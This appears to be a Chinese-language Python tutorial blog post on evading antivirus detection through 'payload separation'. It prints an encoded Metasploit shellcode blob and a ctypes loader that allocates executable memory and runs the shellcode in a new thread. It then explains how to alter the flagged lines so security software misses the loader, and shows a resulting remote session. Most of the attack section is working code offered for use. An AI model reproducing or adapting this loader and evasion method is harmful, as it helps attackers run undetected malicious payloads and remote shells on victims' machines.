首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

通过Python实现Payload分离免杀过程详解

Posted in Python onJuly 13, 2020

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

通过Python实现Payload分离免杀过程详解

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42
\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66
\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53
\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a
\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30
\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f
\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44
\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51
\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34
\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59
\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72
\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a
\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c
\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67
\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38
\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42
\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a
\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31
\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e
\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c
\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a
\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61
\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57
\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67
\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46
\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62
\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46
\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d
\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67
\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64
 
encode_shellcode = "shell_code"
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

通过Python实现Payload分离免杀过程详解

免杀效果:

通过Python实现Payload分离免杀过程详解

参考资料:

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

通过Python实现Payload分离免杀过程详解

- Author -

返回主页aptkekeo

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
python实现简单的socket server实例
Apr 29 Python
python各种语言间时间的转化实现代码
Mar 23 Python
python中matplotlib实现最小二乘法拟合的过程详解
Jul 11 Python
Python实现字典按照value进行排序的方法分析
Dec 23 Python
OpenCV2.3.1+Python2.7.3+Numpy等的配置解析
Jan 05 Python
Win10下python 2.7.13 安装配置方法图文教程
Sep 18 Python
python实现抽奖小程序
Apr 15 Python
python绘制评估优化算法性能的测试函数
Jun 25 Python
python 直接赋值和copy的区别详解
Aug 07 Python
关于pytorch中全连接神经网络搭建两种模式详解
Jan 14 Python
Python LMDB库的使用示例
Feb 14 Python
Python基础教程,Python入门教程(超详细)
Jun 24 Python
python上selenium的弹框操作实现
Jul 13 #Python
python如何导入依赖包
Jul 13 #Python
python入门:argparse浅析 nargs='+'作用
Jul 12 #Python
浅谈Python 命令行参数argparse写入图片路径操作
Jul 12 #Python
Python实现封装打包自己写的代码,被python import
Jul 12 #Python
Django封装交互接口代码
Jul 12 #Python
在django中实现choices字段获取对应字段值
Jul 12 #Python
XPathParser(1) protocol(1) xps(1) sock(2) Windows server 2003(1) csgo(1) mysqldump(1) sentinel(1) Stater(1) ACID(1)
You might like
php重定向的三种方法分享
2012/02/22 PHP
php中convert_uuencode()与convert_uuencode函数用法实例
2014/11/22 PHP
php实现多城市切换特效
2015/08/09 PHP
YiiFramework入门知识点总结(图文教程)
2015/12/28 PHP
PHP读取mssql json数据中文乱码的解决办法
2016/04/11 PHP
php封装db类连接sqlite3数据库的方法实例
2017/12/19 PHP
IE和FireFox(FF)中js和css的不同
2009/04/13 Javascript
Extjs 几个方法的讨论
2010/01/28 Javascript
js 如何实现对数据库的增删改查
2012/11/23 Javascript
javascript设置连续两次点击按钮时间间隔的方法
2014/10/28 Javascript
node.js中的fs.lstatSync方法使用说明
2014/12/16 Javascript
JavaScript检测实例属性, 原型属性
2015/02/04 Javascript
javascript解三阶幻方(九宫格)
2015/04/22 Javascript
JavaScript实现级联菜单的方法
2015/06/29 Javascript
jQuery同步提交示例代码
2015/12/12 Javascript
Jquery插件仿百度搜索关键字自动匹配功能
2016/05/11 Javascript
JS动态计算移动端rem的解决方案
2016/10/14 Javascript
AngularJS自定义控件实例详解
2016/12/13 Javascript
Bootstrap CSS布局之图像
2016/12/17 Javascript
JavaScript脚本语言是什么_动力节点Java学院整理
2017/06/26 Javascript
[02:55]DOTA2英雄基础教程 发条技师
2013/12/04 DOTA
[46:55]Ti4 冒泡赛第二轮 LGD vs C9
2014/07/14 DOTA
[36:19]2018DOTA2亚洲邀请赛 小组赛 A组加赛 Newbee vs LGD
2018/04/03 DOTA
urllib和BeautifulSoup爬取维基百科的词条简单实例
2018/01/17 Python
python实现Decorator模式实例代码
2018/02/09 Python
Python通过yagmail实现发送邮件代码解析
2020/10/27 Python
Data URI scheme详解和使用实例及图片base64编码实现方法
2014/05/08 HTML / CSS
HTML5学习笔记之html5与传统html区别
2016/01/06 HTML / CSS
一道写SQL的面试题和答案
2013/11/19 面试题
什么是三层交换,说说和路由的区别在那里
2014/09/01 面试题
四川internet信息高速公路(C#)笔试题
2012/02/29 面试题
应届毕业生通用的自荐书范文
2014/02/07 职场文书
学校消防安全责任书
2014/07/23 职场文书
学生上课看漫画的检讨书
2014/09/26 职场文书
高效笔记技巧分享:学会这些让你不再困扰
2019/09/04 职场文书
python数字图像处理数据类型及颜色空间转换
2022/06/28 Python